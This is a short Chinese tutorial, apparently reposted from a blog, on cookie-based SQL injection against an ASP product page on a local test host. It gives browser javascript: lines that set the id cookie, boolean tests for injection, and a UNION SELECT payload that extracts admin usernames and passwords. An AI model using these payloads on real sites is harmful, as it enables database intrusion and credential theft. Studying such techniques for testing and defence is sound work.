1.先访问当前注入点文件名
2.修改cookie
javascript:alert(document.cookie="id="+escape("1137"));
把当前站点的cookie内容修改为id=260 并且弹窗显示出当前的cookie内容
注入点:
http://127.0.0.1:800/asp/Production/PRODUCT_DETAIL.asp?id=1137
注入点文件名:
http://127.0.0.1:800/asp/Production/PRODUCT_DETAIL.asp?
javascript:alert(document.cookie="id="+escape("260"));
内容:document.cookie="id="+escape("260")
document.cookie //修改cookie
"id="+escape("260")
//id是咱们注入点的参数
260 //参数值
javascript //使用js语句
alert //弹出窗口,
javascript:alert(document.cookie="id="+escape("1137"));
把当前站点的cookie内容修改为id=260 并且弹窗显示出当前的cookie内容
判断是否存在注入
javascript:alert(document.cookie="id="+escape("1137 and 1=1"));
返回正常
javascript:alert(document.cookie="id="+escape("1137 and 1=221"));
返回错误
查询指定管理员
javascript:alert(document.cookie="id="+escape("1137 union select 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin where id=40"));
原文:http://www.cnblogs.com/wakcp/p/5854278.html